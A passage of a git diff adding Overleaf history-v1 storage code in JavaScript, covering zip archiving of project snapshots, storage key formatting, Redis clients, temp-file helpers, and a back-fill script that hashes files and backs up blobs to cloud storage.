} + + function isOlderThanMaxChangeTimestamp(change) { + return change.getTimestamp().getTime() < limits.maxChangeTimestamp + } + + const oldChanges = _.filter(allChanges, isOlderThanMinChangeTimestamp) + const anyTooOld = _.some(oldChanges, isOlderThanMaxChangeTimestamp) + const tooManyChanges = oldChanges.length > limits.maxChanges + const tooManyBytes = totalChangeBytes(oldChanges) > limits.maxChangeBytes + + if (anyTooOld || tooManyChanges || tooManyBytes) { + changesToPersist = oldChanges + const numberOfChangesToPersist = oldChanges.length + + await extendLastChunkIfPossible() + await createNewChunksAsNeeded() + + return { + numberOfChangesPersisted: numberOfChangesToPersist, + originalEndVersion, + currentChunk, + } + } else { + return null + } +} + +module.exports = persistChanges diff --git a/services/history-v1/storage/lib/persistor.js b/services/history-v1/storage/lib/persistor.js new file mode 100644 index 0000000..5b3400d --- /dev/null +++ b/services/history-v1/storage/lib/persistor.js @@ -0,0 +1,27 @@ +const _ = require('lodash') +const config = require('config') +const metrics = require('@overleaf/metrics') +const objectPersistor = require('@overleaf/object-persistor') + +const persistorConfig = _.cloneDeep(config.get('persistor')) + +function convertKey(key, convertFn) { + if (_.has(persistorConfig, key)) { + _.update(persistorConfig, key, convertFn) + } +} + +convertKey('s3.signedUrlExpiryInMs', s => parseInt(s, 10)) +convertKey('s3.httpOptions.timeout', s => parseInt(s, 10)) +convertKey('s3.maxRetries', s => parseInt(s, 10)) +convertKey('s3.pathStyle', s => s === 'true') +convertKey('gcs.unlockBeforeDelete', s => s === 'true') +convertKey('gcs.unsignedUrls', s => s === 'true') +convertKey('gcs.signedUrlExpiryInMs', s => parseInt(s, 10)) +convertKey('gcs.deleteConcurrency', s => parseInt(s, 10)) +convertKey('gcs.retryOptions.maxRetries', s => parseInt(s, 10)) +convertKey('fallback.buckets', s => JSON.parse(s || '{}')) + +persistorConfig.Metrics = metrics + +module.exports = objectPersistor(persistorConfig) diff --git 
a/services/history-v1/storage/lib/project_archive.js b/services/history-v1/storage/lib/project_archive.js new file mode 100644 index 0000000..8a8e93f --- /dev/null +++ b/services/history-v1/storage/lib/project_archive.js @@ -0,0 +1,140 @@ +// @ts-check +'use strict' + +/** + * @import { Snapshot } from 'overleaf-editor-core' + * @import { BlobStore } from '../../storage/lib/blob_store/index' + */ + +const Archive = require('archiver') +const BPromise = require('bluebird') +const fs = require('node:fs') +const { pipeline } = require('node:stream') + +const core = require('overleaf-editor-core') + +const Snapshot = core.Snapshot +const OError = require('@overleaf/o-error') + +const assert = require('./assert') + +// The maximum safe concurrency appears to be 1. +// https://github.com/overleaf/issues/issues/1909 +const FETCH_CONCURRENCY = 1 // number of files to fetch at once +const DEFAULT_ZIP_TIMEOUT = 25000 // ms + +class DownloadError extends OError { + constructor(hash) { + super(`ProjectArchive: blob download failed: ${hash}`, { hash }) + } +} + +class ArchiveTimeout extends OError { + constructor() { + super('ProjectArchive timed out') + } +} + +class MissingfileError extends OError { + constructor() { + super('ProjectArchive: attempting to look up a file that does not exist') + } +} + +class ProjectArchive { + static ArchiveTimeout = ArchiveTimeout + static MissingfileError = MissingfileError + static DownloadError = DownloadError + + /** + * @constructor + * @param {Snapshot} snapshot + * @param {number} [timeout] in ms + * @classdesc + * Writes the project snapshot to a zip file. + */ + constructor(snapshot, timeout) { + assert.instance(snapshot, Snapshot) + this.snapshot = snapshot + this.timeout = timeout || DEFAULT_ZIP_TIMEOUT + } + + /** + * Write zip archive to the given file path. + * + * @param {BlobStore} blobStore + * @param {string} zipFilePath + */ + writeZip(blobStore, zipFilePath) { + const snapshot = this.snapshot + const timeout = this.timeout + + const startTime = process.hrtime() + const archive = new Archive('zip') + + // Convert elapsed seconds and nanoseconds to milliseconds. 
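    // (Editor's note: process.hrtime() deltas are [seconds, nanoseconds];
    // 1 s = 1e3 ms and 1 ns = 1e-6 ms, hence the two factors below.)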
+ function findElapsedMilliseconds() { + const elapsed = process.hrtime(startTime) + return elapsed[0] * 1e3 + elapsed[1] * 1e-6 + } + + function addFileToArchive(pathname) { + if (findElapsedMilliseconds() > timeout) { + throw new ProjectArchive.ArchiveTimeout() + } + + const file = snapshot.getFile(pathname) + if (!file) { + throw new ProjectArchive.MissingfileError() + } + return file.load('eager', blobStore).then(function () { + const content = file.getContent({ filterTrackedDeletes: true }) + if (content === null) { + return streamFileToArchive(pathname, file).catch(function (err) { + throw new ProjectArchive.DownloadError(file.getHash()).withCause( + err + ) + }) + } else { + archive.append(content, { name: pathname }) + } + }) + } + + function streamFileToArchive(pathname, file) { + return new BPromise(function (resolve, reject) { + blobStore + .getStream(file.getHash()) + .then(stream => { + stream.on('error', reject) + stream.on('end', resolve) + archive.append(stream, { name: pathname }) + }) + .catch(reject) + }) + } + + const addFilesToArchiveAndFinalize = BPromise.map( + snapshot.getFilePathnames(), + addFileToArchive, + { concurrency: FETCH_CONCURRENCY } + ).then(function () { + archive.finalize() + }) + + const streamArchiveToFile = new BPromise(function (resolve, reject) { + const stream = fs.createWriteStream(zipFilePath) + pipeline(archive, stream, function (err) { + if (err) { + reject(err) + } else { + resolve() + } + }) + }) + + return BPromise.join(streamArchiveToFile, addFilesToArchiveAndFinalize) + } +} + +module.exports = ProjectArchive diff --git a/services/history-v1/storage/lib/project_key.js b/services/history-v1/storage/lib/project_key.js new file mode 100644 index 0000000..03fb2a5 --- /dev/null +++ b/services/history-v1/storage/lib/project_key.js @@ -0,0 +1,24 @@ +// Keep in sync with services/web/app/src/Features/History/project_key.js +const _ = require('lodash') +const path = require('node:path') + +// +// The advice in http://docs.aws.amazon.com/AmazonS3/latest/dev/ +// request-rate-perf-considerations.html is to avoid sequential key prefixes, +// so we reverse the project ID part of the key as they suggest. 
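// Worked example (editor's note, hypothetical ID): pad('123') gives
// '000000123', which reverses to '321000000', so format('123') yields
// '321/000/000'.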
+// +function format(projectId) { + const prefix = naiveReverse(pad(projectId)) + return path.join(prefix.slice(0, 3), prefix.slice(3, 6), prefix.slice(6)) +} + +function pad(number) { + return _.padStart(number, 9, '0') +} + +function naiveReverse(string) { + return string.split('').reverse().join('') +} + +exports.format = format +exports.pad = pad diff --git a/services/history-v1/storage/lib/redis.js b/services/history-v1/storage/lib/redis.js new file mode 100644 index 0000000..9b00cc0 --- /dev/null +++ b/services/history-v1/storage/lib/redis.js @@ -0,0 +1,19 @@ +const config = require('config') +const redis = require('@overleaf/redis-wrapper') + +const historyRedisOptions = config.get('redis.history') +const rclientHistory = redis.createClient(historyRedisOptions) + +const lockRedisOptions = config.get('redis.history') +const rclientLock = redis.createClient(lockRedisOptions) + +async function disconnect() { + await Promise.all([rclientHistory.disconnect(), rclientLock.disconnect()]) +} + +module.exports = { + rclientHistory, + rclientLock, + redis, + disconnect, +} diff --git a/services/history-v1/storage/lib/streams.js b/services/history-v1/storage/lib/streams.js new file mode 100644 index 0000000..e60e5aa --- /dev/null +++ b/services/history-v1/storage/lib/streams.js @@ -0,0 +1,40 @@ +// @ts-check +/** + * Promises are promises and streams are streams, and ne'er the twain shall + * meet. + * @module + */ +'use strict' + +const Stream = require('node:stream') +const zlib = require('node:zlib') +const { WritableBuffer } = require('@overleaf/stream-utils') + +/** + * Create a promise for the result of reading a stream to a buffer. + * + * @param {Stream.Readable} readStream + * @return {Promise<Buffer>} + */ +async function readStreamToBuffer(readStream) { + const bufferStream = new WritableBuffer() + await Stream.promises.pipeline(readStream, bufferStream) + return bufferStream.contents() +} + +exports.readStreamToBuffer = readStreamToBuffer + +/** + * Create a promise for the result of un-gzipping a stream to a buffer. + * + * @param {NodeJS.ReadableStream} readStream + * @return {Promise<Buffer>} + */ +async function gunzipStreamToBuffer(readStream) { + const gunzip = zlib.createGunzip() + const bufferStream = new WritableBuffer() + await Stream.promises.pipeline(readStream, gunzip, bufferStream) + return bufferStream.contents() +} + +exports.gunzipStreamToBuffer = gunzipStreamToBuffer diff --git a/services/history-v1/storage/lib/temp.js b/services/history-v1/storage/lib/temp.js new file mode 100644 index 0000000..1aab3c1 --- /dev/null +++ b/services/history-v1/storage/lib/temp.js @@ -0,0 +1,25 @@ +/* + * Taken from renderer/app/helpers/temp.js with minor cosmetic changes. + * Promisify the temp package. The temp package provides a 'track' feature + * that automatically cleans up temp files at process exit, but that is not + * very useful. They also provide a method to trigger cleanup, but that is not + * safe for concurrent use. So, we use a disposer to unlink the file. 
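 *
 * Usage sketch (editor's note, not part of this commit), mirroring how
 * zip_store.js consumes this module:
 *
 *   await BPromise.using(temp.open('zip'), async fileInfo => {
 *     // write to fileInfo.path; the disposer then closes the fd and
 *     // unlinks the file once this block settles
 *   })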
+ */ + +const BPromise = require('bluebird') +const fs = BPromise.promisifyAll(require('node:fs')) +const temp = BPromise.promisifyAll(require('temp')) + +exports.open = function (affixes) { + return temp.openAsync(affixes).disposer(function (fileInfo) { + fs.closeAsync(fileInfo.fd) + .then(() => { + return fs.unlinkAsync(fileInfo.path) + }) + .catch(function (err) { + if (err.code !== 'ENOENT') { + throw err + } + }) + }) +} diff --git a/services/history-v1/storage/lib/zip_store.js b/services/history-v1/storage/lib/zip_store.js new file mode 100644 index 0000000..0741829 --- /dev/null +++ b/services/history-v1/storage/lib/zip_store.js @@ -0,0 +1,134 @@ +'use strict' + +const BPromise = require('bluebird') +const config = require('config') +const fs = require('node:fs') +const path = require('node:path') + +const OError = require('@overleaf/o-error') +const objectPersistor = require('@overleaf/object-persistor') + +const assert = require('./assert') +const { BlobStore } = require('./blob_store') +const persistor = require('./persistor') +const ProjectArchive = require('./project_archive') +const projectKey = require('./project_key') +const temp = require('./temp') + +const BUCKET = config.get('zipStore.bucket') + +function getZipKey(projectId, version) { + return path.join( + projectKey.format(projectId), + version.toString(), + 'project.zip' + ) +} + +/** + * Store a zip of a given version of a project in bucket. + * + * @class + */ +class ZipStore { + /** + * Generate signed link to access the zip file. + * + * @param {number | string} projectId + * @param {number} version + * @return {string} + */ + async getSignedUrl(projectId, version) { + assert.projectId(projectId, 'bad projectId') + assert.integer(version, 'bad version') + + const key = getZipKey(projectId, version) + return await persistor.getRedirectUrl(BUCKET, key) + } + + /** + * Generate a zip of the given snapshot. + * + * @param {number | string} projectId + * @param {number} version + * @param {Snapshot} snapshot + */ + async storeZip(projectId, version, snapshot) { + assert.projectId(projectId, 'bad projectId') + assert.integer(version, 'bad version') + assert.object(snapshot, 'bad snapshot') + + const zipKey = getZipKey(projectId, version) + + if (await isZipPresent()) return + + await BPromise.using(temp.open('zip'), async tempFileInfo => { + await zipSnapshot(tempFileInfo.path, snapshot) + await uploadZip(tempFileInfo.path) + }) + + // If the file is already there, we don't need to build the zip again. If we + // just HEAD the file, there's a race condition, because the zip files + // automatically expire. So, we try to copy the file from itself to itself, + // and if it fails, we know the file didn't exist. If it succeeds, this has + // the effect of re-extending its lifetime. 
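    // (Editor's note: the self-copy is a server-side operation, so it
    // refreshes the object's last-modified time without re-uploading any
    // data.)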
+ async function isZipPresent() { + try { + await persistor.copyObject(BUCKET, zipKey, zipKey) + return true + } catch (error) { + if (!(error instanceof objectPersistor.Errors.NotFoundError)) { + console.error( + 'storeZip: isZipPresent: unexpected error (except in dev): %s', + error + ) + } + return false + } + } + + async function zipSnapshot(tempPathname, snapshot) { + const blobStore = new BlobStore(projectId) + const zipTimeoutMs = parseInt(config.get('zipStore.zipTimeoutMs'), 10) + const archive = new ProjectArchive(snapshot, zipTimeoutMs) + try { + await archive.writeZip(blobStore, tempPathname) + } catch (err) { + throw new ZipStore.CreationError(projectId, version).withCause(err) + } + } + + async function uploadZip(tempPathname, snapshot) { + const stream = fs.createReadStream(tempPathname) + try { + await persistor.sendStream(BUCKET, zipKey, stream, { + contentType: 'application/zip', + }) + } catch (err) { + throw new ZipStore.UploadError(projectId, version).withCause(err) + } + } + } +} + +class CreationError extends OError { + constructor(projectId, version) { + super(`Zip creation failed for ${projectId} version ${version}`, { + projectId, + version, + }) + } +} +ZipStore.CreationError = CreationError + +class UploadError extends OError { + constructor(projectId, version) { + super(`Zip upload failed for ${projectId} version ${version}`, { + projectId, + version, + }) + } +} +ZipStore.UploadError = UploadError + +module.exports = new ZipStore() diff --git a/services/history-v1/storage/scripts/back_fill_file_hash.mjs b/services/history-v1/storage/scripts/back_fill_file_hash.mjs new file mode 100644 index 0000000..96dfd79 --- /dev/null +++ b/services/history-v1/storage/scripts/back_fill_file_hash.mjs @@ -0,0 +1,1476 @@ +// @ts-check +import Crypto from 'node:crypto' +import Events from 'node:events' +import fs from 'node:fs' +import Path from 'node:path' +import { performance } from 'node:perf_hooks' +import Stream from 'node:stream' +import zLib from 'node:zlib' +import { setTimeout } from 'node:timers/promises' +import { Binary, ObjectId } from 'mongodb' +import pLimit from 'p-limit' +import logger from '@overleaf/logger' +import { + batchedUpdate, + objectIdFromInput, + renderObjectId, + READ_PREFERENCE_SECONDARY, +} from '@overleaf/mongo-utils/batchedUpdate.js' +import OError from '@overleaf/o-error' +import { + AlreadyWrittenError, + NoKEKMatchedError, + NotFoundError, +} from '@overleaf/object-persistor/src/Errors.js' +import { backupPersistor, projectBlobsBucket } from '../lib/backupPersistor.mjs' +import { + BlobStore, + GLOBAL_BLOBS, + loadGlobalBlobs, + getProjectBlobsBatch, + getStringLengthOfFile, + makeBlobForFile, + makeProjectKey, +} from '../lib/blob_store/index.js' +import { backedUpBlobs as backedUpBlobsCollection, db } from '../lib/mongodb.js' +import filestorePersistor from '../lib/persistor.js' +import commandLineArgs from 'command-line-args' +import readline from 'node:readline' + +// Silence warning. 
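// (Editor's note: this raises the default per-emitter listener cap from 10 so
// that the many concurrent streams used below do not trigger a
// MaxListenersExceededWarning.)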
+Events.setMaxListeners(20) + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +/** + * @typedef {import("overleaf-editor-core").Blob} Blob + * @typedef {import("perf_hooks").EventLoopUtilization} EventLoopUtilization + * @typedef {import("mongodb").Collection} Collection + * @typedef {import("mongodb").Collection<Project>} ProjectsCollection + * @typedef {import("mongodb").Collection<{project:Project}>} DeletedProjectsCollection + * @typedef {import("@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor").CachedPerProjectEncryptedS3Persistor} CachedPerProjectEncryptedS3Persistor + */ + +/** + * @typedef {Object} FileRef + * @property {ObjectId} _id + * @property {string} hash + */ + +/** + * @typedef {Object} Folder + * @property {Array<Folder>} folders + * @property {Array<FileRef>} fileRefs + */ + +/** + * @typedef {Object} DeletedFileRef + * @property {ObjectId} _id + * @property {ObjectId} projectId + * @property {string} hash + */ + +/** + * @typedef {Object} Project + * @property {ObjectId} _id + * @property {Array<Folder>} rootFolder + * @property {{history: {id: (number|string)}}} overleaf + */ + +/** + * @typedef {Object} QueueEntry + * @property {ProjectContext} ctx + * @property {string} cacheKey + * @property {string} [fileId] + * @property {string} path + * @property {string} [hash] + * @property {Blob} [blob] + */ + +/** + * @return {{PROJECT_IDS_FROM: string, PROCESS_HASHED_FILES: boolean, PROCESS_DELETED_FILES: boolean, LOGGING_IDENTIFIER: string, BATCH_RANGE_START: string, PROCESS_BLOBS: boolean, BATCH_RANGE_END: string, PROCESS_NON_DELETED_PROJECTS: boolean, PROCESS_DELETED_PROJECTS: boolean, COLLECT_BACKED_UP_BLOBS: boolean}} + */ +function parseArgs() { + const PUBLIC_LAUNCH_DATE = new Date('2012-01-01T00:00:00Z') + const args = commandLineArgs([ + { name: 'processNonDeletedProjects', type: String, defaultValue: 'false' }, + { name: 'processDeletedProjects', type: String, defaultValue: 'false' }, + { name: 'processDeletedFiles', type: String, defaultValue: 'false' }, + { name: 'processHashedFiles', type: String, defaultValue: 'false' }, + { name: 'processBlobs', type: String, defaultValue: 'true' }, + { name: 'projectIdsFrom', type: String, defaultValue: '' }, + { name: 'collectBackedUpBlobs', type: String, defaultValue: 'true' }, + { + name: 'BATCH_RANGE_START', + type: String, + defaultValue: PUBLIC_LAUNCH_DATE.toISOString(), + }, + { + name: 'BATCH_RANGE_END', + type: String, + defaultValue: new Date().toISOString(), + }, + { name: 'LOGGING_IDENTIFIER', type: String, defaultValue: '' }, + ]) + /** + * commandLineArgs cannot handle --foo=false, so go the long way + * @param {string} name + * @return {boolean} + */ + function boolVal(name) { + const v = args[name] + if (['true', 'false'].includes(v)) return v === 'true' + throw new Error(`expected "true" or "false" for boolean option ${name}`) + } + const BATCH_RANGE_START = objectIdFromInput( + args['BATCH_RANGE_START'] + ).toString() + const BATCH_RANGE_END = objectIdFromInput(args['BATCH_RANGE_END']).toString() + return { + PROCESS_NON_DELETED_PROJECTS: boolVal('processNonDeletedProjects'), + PROCESS_DELETED_PROJECTS: boolVal('processDeletedProjects'), + PROCESS_BLOBS: boolVal('processBlobs'), + PROCESS_DELETED_FILES: boolVal('processDeletedFiles'), + PROCESS_HASHED_FILES: boolVal('processHashedFiles'), + COLLECT_BACKED_UP_BLOBS: boolVal('collectBackedUpBlobs'), + BATCH_RANGE_START, + BATCH_RANGE_END, + LOGGING_IDENTIFIER: args['LOGGING_IDENTIFIER'] || BATCH_RANGE_START, + 
PROJECT_IDS_FROM: args['projectIdsFrom'], + } +} + +const { + PROCESS_NON_DELETED_PROJECTS, + PROCESS_DELETED_PROJECTS, + PROCESS_BLOBS, + PROCESS_DELETED_FILES, + PROCESS_HASHED_FILES, + COLLECT_BACKED_UP_BLOBS, + BATCH_RANGE_START, + BATCH_RANGE_END, + LOGGING_IDENTIFIER, + PROJECT_IDS_FROM, +} = parseArgs() + +// We need to handle the start and end differently as ids of deleted projects are created at time of deletion. +if (process.env.BATCH_RANGE_START || process.env.BATCH_RANGE_END) { + throw new Error('use --BATCH_RANGE_START and --BATCH_RANGE_END') +} + +// Concurrency for downloading from GCS and updating hashes in mongo +const CONCURRENCY = parseInt(process.env.CONCURRENCY || '100', 10) +const CONCURRENT_BATCHES = parseInt(process.env.CONCURRENT_BATCHES || '2', 10) +// Retries for processing a given file +const RETRIES = parseInt(process.env.RETRIES || '10', 10) +const RETRY_DELAY_MS = parseInt(process.env.RETRY_DELAY_MS || '100', 10) + +const USER_FILES_BUCKET_NAME = process.env.USER_FILES_BUCKET_NAME || '' +if (!USER_FILES_BUCKET_NAME) { + throw new Error('env var USER_FILES_BUCKET_NAME is missing') +} +const RETRY_FILESTORE_404 = process.env.RETRY_FILESTORE_404 === 'true' +const BUFFER_DIR = fs.mkdtempSync( + process.env.BUFFER_DIR_PREFIX || '/tmp/back_fill_file_hash-' +) +// https://nodejs.org/api/stream.html#streamgetdefaulthighwatermarkobjectmode +const STREAM_HIGH_WATER_MARK = parseInt( + process.env.STREAM_HIGH_WATER_MARK || (64 * 1024).toString(), + 10 +) +const LOGGING_INTERVAL = parseInt(process.env.LOGGING_INTERVAL || '60000', 10) +const SLEEP_BEFORE_EXIT = parseInt(process.env.SLEEP_BEFORE_EXIT || '1000', 10) + +const projectsCollection = db.collection('projects') +/** @type {ProjectsCollection} */ +const typedProjectsCollection = db.collection('projects') +const deletedProjectsCollection = db.collection('deletedProjects') +/** @type {DeletedProjectsCollection} */ +const typedDeletedProjectsCollection = db.collection('deletedProjects') +const deletedFilesCollection = db.collection('deletedFiles') + +const concurrencyLimit = pLimit(CONCURRENCY) + +/** + * @template T + * @template V + * @param {Array<T>} array + * @param {(arg: T) => Promise<V>} fn + * @return {Promise<Array<Awaited<V>>>} + */ +async function processConcurrently(array, fn) { + return await Promise.all(array.map(x => concurrencyLimit(() => fn(x)))) +} + +const STATS = { + projects: 0, + blobs: 0, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 0, + filesDuplicated: 0, + filesRetries: 0, + filesFailed: 0, + fileTreeUpdated: 0, + badFileTrees: 0, + globalBlobsCount: 0, + globalBlobsEgress: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + mongoUpdates: 0, + deduplicatedWriteToAWSLocalCount: 0, + deduplicatedWriteToAWSLocalEgress: 0, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 0, + readFromGCSIngress: 0, + writeToAWSCount: 0, + writeToAWSEgress: 0, + writeToGCSCount: 0, + writeToGCSEgress: 0, +} + +const processStart = performance.now() +let lastLogTS = processStart +let lastLog = Object.assign({}, STATS) +let lastEventLoopStats = performance.eventLoopUtilization() + +/** + * @param {number} v + * @param {number} ms + */ +function toMiBPerSecond(v, ms) { + const ONE_MiB = 1024 * 1024 + return v / ONE_MiB / (ms / 1000) +} + +/** + * @param {any} stats + * @param {number} ms + * @return {{writeToAWSThroughputMiBPerSecond: number, readFromGCSThroughputMiBPerSecond: number}} + */ +function bandwidthStats(stats, ms) { + 
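  // Worked example (editor's note): 512 MiB of GCS ingress over 60_000 ms
  // gives readFromGCSThroughputMiBPerSecond = 512 / 60, i.e. about 8.5.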
return { + readFromGCSThroughputMiBPerSecond: toMiBPerSecond( + stats.readFromGCSIngress, + ms + ), + writeToAWSThroughputMiBPerSecond: toMiBPerSecond( + stats.writeToAWSEgress, + ms + ), + } +} + +/** + * @param {EventLoopUtilization} nextEventLoopStats + * @param {number} now + * @return {Object} + */ +function computeDiff(nextEventLoopStats, now) { + const ms = now - lastLogTS + lastLogTS = now + const diff = { + eventLoop: performance.eventLoopUtilization( + nextEventLoopStats, + lastEventLoopStats + ), + } + for (const [name, v] of Object.entries(STATS)) { + diff[name] = v - lastLog[name] + } + return Object.assign(diff, bandwidthStats(diff, ms)) +} + +/** + * @param {boolean} isLast + */ +function printStats(isLast = false) { + const now = performance.now() + const nextEventLoopStats = performance.eventLoopUtilization() + const logLine = JSON.stringify({ + time: new Date(), + LOGGING_IDENTIFIER, + ...STATS, + ...bandwidthStats(STATS, now - processStart), + eventLoop: nextEventLoopStats, + diff: computeDiff(nextEventLoopStats, now), + deferredBatches: Array.from(deferredBatches.keys()), + }) + if (isLast) { + console.warn(logLine) + } else { + console.log(logLine) + } + lastEventLoopStats = nextEventLoopStats + lastLog = Object.assign({}, STATS) +} + +setInterval(printStats, LOGGING_INTERVAL) + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated, draining queue') +} + +/** + * @param {QueueEntry} entry + * @return {Promise<string>} + */ +async function processFileWithCleanup(entry) { + const { + ctx: { projectId }, + cacheKey, + } = entry + const filePath = Path.join(BUFFER_DIR, projectId.toString() + cacheKey) + try { + return await processFile(entry, filePath) + } finally { + await Promise.all([ + fs.promises.rm(filePath, { force: true }), + fs.promises.rm(filePath + GZ_SUFFIX, { force: true }), + ]) + } +} + +/** + * @param {QueueEntry} entry + * @param {string} filePath + * @return {Promise<string>} + */ +async function processFile(entry, filePath) { + for (let attempt = 0; attempt < RETRIES; attempt++) { + try { + return await processFileOnce(entry, filePath) + } catch (err) { + if (gracefulShutdownInitiated) throw err + if (err instanceof NotFoundError) { + const { bucketName } = OError.getFullInfo(err) + if (bucketName === USER_FILES_BUCKET_NAME && !RETRY_FILESTORE_404) { + throw err // disable retries for not found in filestore bucket case + } + } + if (err instanceof NoKEKMatchedError) { + throw err // disable retries when upload to S3 will fail again + } + STATS.filesRetries++ + const { + ctx: { projectId }, + fileId, + hash, + path, + } = entry + logger.warn( + { err, projectId, fileId, hash, path, attempt }, + 'failed to process file, trying again' + ) + const jitter = Math.random() * RETRY_DELAY_MS + await setTimeout(RETRY_DELAY_MS + jitter) + } + } + return await processFileOnce(entry, filePath) +} + +/** + * @param {QueueEntry} entry + * @param {string} filePath + * @return {Promise<string>} + */ +async function processFileOnce(entry, filePath) { + const { + ctx: { projectId, historyId }, + fileId, + } = entry + const blobStore = new BlobStore(historyId) + if (entry.blob) { + const { blob } = entry + const hash = blob.getHash() + if (entry.ctx.hasBackedUpBlob(hash)) { + STATS.deduplicatedWriteToAWSLocalCount++ + STATS.deduplicatedWriteToAWSLocalEgress += estimateBlobSize(blob) + return hash + } + 
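    // (Editor's note: marking the hash as pending before the download starts
    // lets hasBackedUpBlob() deduplicate concurrent entries for the same
    // blob.)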
entry.ctx.recordPendingBlob(hash) + STATS.readFromGCSCount++ + const src = await blobStore.getStream(hash) + const dst = fs.createWriteStream(filePath, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + try { + await Stream.promises.pipeline(src, dst) + } finally { + STATS.readFromGCSIngress += dst.bytesWritten + } + await uploadBlobToAWS(entry, blob, filePath) + return hash + } + if (entry.hash && entry.ctx.hasBackedUpBlob(entry.hash)) { + STATS.deduplicatedWriteToAWSLocalCount++ + const blob = entry.ctx.getCachedHistoryBlob(entry.hash) + // blob might not exist on re-run with --PROCESS_BLOBS=false + if (blob) STATS.deduplicatedWriteToAWSLocalEgress += estimateBlobSize(blob) + return entry.hash + } + + STATS.readFromGCSCount++ + const src = await filestorePersistor.getObjectStream( + USER_FILES_BUCKET_NAME, + `${projectId}/${fileId}` + ) + const dst = fs.createWriteStream(filePath, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + try { + await Stream.promises.pipeline(src, dst) + } finally { + STATS.readFromGCSIngress += dst.bytesWritten + } + const blob = await makeBlobForFile(filePath) + blob.setStringLength( + await getStringLengthOfFile(blob.getByteLength(), filePath) + ) + const hash = blob.getHash() + if (entry.hash && hash !== entry.hash) { + throw new OError('hash mismatch', { entry, hash }) + } + + if (GLOBAL_BLOBS.has(hash)) { + STATS.globalBlobsCount++ + STATS.globalBlobsEgress += estimateBlobSize(blob) + return hash + } + if (entry.ctx.hasBackedUpBlob(hash)) { + STATS.deduplicatedWriteToAWSLocalCount++ + STATS.deduplicatedWriteToAWSLocalEgress += estimateBlobSize(blob) + return hash + } + entry.ctx.recordPendingBlob(hash) + + try { + await uploadBlobToGCS(blobStore, entry, blob, hash, filePath) + await uploadBlobToAWS(entry, blob, filePath) + } catch (err) { + entry.ctx.recordFailedBlob(hash) + throw err + } + return hash +} + +/** + * @param {BlobStore} blobStore + * @param {QueueEntry} entry + * @param {Blob} blob + * @param {string} hash + * @param {string} filePath + * @return {Promise<void>} + */ +async function uploadBlobToGCS(blobStore, entry, blob, hash, filePath) { + if (entry.ctx.getCachedHistoryBlob(hash)) { + return // fast-path using hint from pre-fetched blobs + } + if (!PROCESS_BLOBS) { + // round trip to postgres/mongo when not pre-fetched + const blob = await blobStore.getBlob(hash) + if (blob) { + entry.ctx.recordHistoryBlob(blob) + return + } + } + // blob missing in history-v1, create in GCS and persist in postgres/mongo + STATS.writeToGCSCount++ + STATS.writeToGCSEgress += blob.getByteLength() + await blobStore.putBlob(filePath, blob) + entry.ctx.recordHistoryBlob(blob) +} + +const GZ_SUFFIX = '.gz' + +/** + * @param {QueueEntry} entry + * @param {Blob} blob + * @param {string} filePath + * @return {Promise<void>} + */ +async function uploadBlobToAWS(entry, blob, filePath) { + const { historyId } = entry.ctx + let backupSource + let contentEncoding + const md5 = Crypto.createHash('md5') + let size + if (blob.getStringLength()) { + const filePathCompressed = filePath + GZ_SUFFIX + backupSource = filePathCompressed + contentEncoding = 'gzip' + size = 0 + await Stream.promises.pipeline( + fs.createReadStream(filePath, { highWaterMark: STREAM_HIGH_WATER_MARK }), + zLib.createGzip(), + async function* (source) { + for await (const chunk of source) { + size += chunk.byteLength + md5.update(chunk) + yield chunk + } + }, + fs.createWriteStream(filePathCompressed, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + ) + } else { + backupSource = filePath + size = 
blob.getByteLength() + await Stream.promises.pipeline( + fs.createReadStream(filePath, { highWaterMark: STREAM_HIGH_WATER_MARK }), + md5 + ) + } + const backendKeyPath = makeProjectKey(historyId, blob.getHash()) + const persistor = await entry.ctx.getCachedPersistor(backendKeyPath) + try { + STATS.writeToAWSCount++ + await persistor.sendStream( + projectBlobsBucket, + backendKeyPath, + fs.createReadStream(backupSource, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }), + { + contentEncoding, + contentType: 'application/octet-stream', + contentLength: size, + sourceMd5: md5.digest('hex'), + ifNoneMatch: '*', // de-duplicate write (we pay for the request, but avoid egress) + } + ) + STATS.writeToAWSEgress += size + } catch (err) { + if (err instanceof AlreadyWrittenError) { + STATS.deduplicatedWriteToAWSRemoteCount++ + STATS.deduplicatedWriteToAWSRemoteEgress += size + } else { + STATS.writeToAWSEgress += size + throw err + } + } + entry.ctx.recordBackedUpBlob(blob.getHash()) +} + +/** + * @param {Array<QueueEntry>} files + * @return {Promise<void>} + */ +async function processFiles(files) { + await processConcurrently( + files, + /** + * @param {QueueEntry} entry + * @return {Promise<void>} + */ + async function (entry) { + if (gracefulShutdownInitiated) return + try { + await entry.ctx.processFile(entry) + } catch (err) { + STATS.filesFailed++ + const { + ctx: { projectId }, + fileId, + hash, + path, + } = entry + logger.error( + { err, projectId, fileId, hash, path }, + 'failed to process file' + ) + } + } + ) +} + +/** @type {Map<string, Promise>} */ +const deferredBatches = new Map() + +async function waitForDeferredQueues() { + // Wait for ALL pending batches to finish, especially wait for their mongo + // writes to finish to avoid extra work when resuming the batch. + const all = await Promise.allSettled(deferredBatches.values()) + // Now that all batches finished, we can throw if needed. + for (const res of all) { + if (res.status === 'rejected') { + throw res.reason + } + } +} + +/** + * @param {Array<Project>} batch + * @param {string} prefix + */ +async function queueNextBatch(batch, prefix = 'rootFolder.0') { + if (gracefulShutdownInitiated) { + throw new Error('graceful shutdown: aborting batch processing') + } + + // Read ids now, the batch will get trimmed by processBatch shortly. + const start = renderObjectId(batch[0]._id) + const end = renderObjectId(batch[batch.length - 1]._id) + const deferred = processBatch(batch, prefix) + .then(() => { + console.error(`Actually completed batch ending ${end}`) + }) + .catch(err => { + logger.error({ err, start, end }, 'fatal error processing batch') + throw err + }) + .finally(() => { + deferredBatches.delete(end) + }) + deferredBatches.set(end, deferred) + + if (deferredBatches.size >= CONCURRENT_BATCHES) { + // Wait for any of the deferred batches to finish before fetching the 